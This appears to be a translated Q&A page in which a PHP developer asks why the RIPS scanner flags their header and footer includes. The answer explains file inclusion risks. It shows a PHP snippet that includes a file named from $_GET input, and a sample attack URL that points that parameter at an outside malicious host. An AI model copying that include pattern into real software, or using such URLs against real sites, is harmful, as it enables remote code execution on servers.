Dak*_*h B 8 php security whitelist include
我有一个header.php和一个footer.php,我将其包含在所有其他页面中,如家,联系,关于我们等.
我包含页眉和页脚文件的方式是
<?php include 'inc/header.php';
some code
some code
include 'inc/header.php'; ?>
一切都很简单,工作正常.
我决定检查我的项目是否存在漏洞并下载了RIPS扫描程序.扫描后,结果
Userinput reaches sensitive sink.
5: include include 'inc/header.php'; // header.php
requires:
5: if(!in_array($_GET['file'], $files)) else
这基本上说,页眉和页脚都是易受攻击的,我应该使用
if(!in_array($_GET['file'], $files)) else
为什么简单的包含页眉和页脚文件容易受到攻击?如果是易受攻击的,我该如何实现if(!in_array($ _ GET ['file'],$ files))else ??
header.php文件
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="icon" href="images/common/lbfavicon.ico" />
<meta name="author" content="example.com" />
<link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
<link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>
<body>
<div id="header-wrapper">
<div class="container">
<div id="nav">
<ul>
<li><a href="./">Home</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</div><!-- nav ends -->
</div><!-- container ends -->
</div><!-- header wrapper ends -->
<div id="header">
<div class="container">
<div id="logo">
<a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
</div><!-- logo ends -->
<div id="search">
<form method="get" action="searchresult.php">
<div class="form-item">
Search: <input type="text" maxlength="120" name="searchfor" />
</div>
</form>
</div><!-- search ends -->
</div><!-- container ends-->
</div><!-- header ends -->
<div class="container">
<div id="announcement">
<div id="breadcrumbs"></div>
</div><!-- announcement ends -->
<div id="pagewrapper">
Footer.php
<div id="bottom">
<div class="column">
<h2>Abc.com</h2>
<ul>
<li><a href="about">About</a></li>
<li><a href="contact">Contact</a></li>
</ul>
</div>
<div class="column">
<h2>Mode of payment</h2>
<ul>
<li>Credit/Debit card | Cheque | Demand draft</li>
</ul>
<h2>Get in touch</h2>
<ul>
<li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
</ul>
</div>
<div class="column">
<h2>Call us / Mail us</h2>
<ul>
<li>0-9999384745 / <a href="mailto:info@example.com">info@example.com</a></li>
</ul>
<h2>Share us</h2>
<ul>
<li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
</ul>
</div>
<div style="clear: both;"></div>
</div> <!-- bottom ends -->
<div id="footer">
</div>
</div> <!--Pagewrapper end-->
</div>
</body>
</html>
好吧,我想这只是一个警告,但在全球范围内,当你包含名称来自用户输入的.php脚本时,你应该绝对检查提供的名称是否正确(以防止出现安全问题).
例如,许多网站使用"全局"文件,该文件将根据来自用户的请求包含文件.
示例:
<?php
$get = $_GET['action'];
if ($get == "index") {
include "includes/index.php";
}
//...
else
{
include $get .".php";
}
现在让我们想象有人想在你的网站中加入一些恶意脚本.如果您的服务器允许跨网站请求,那么人们可以指定一些可能对您的服务器或其他用户造成危险的外部脚本.
示例:./ global.php?action = http://malicious4ever.com/dirtything
| 归档时间: |
|
| 查看次数: |
970 次 |
| 最近记录: |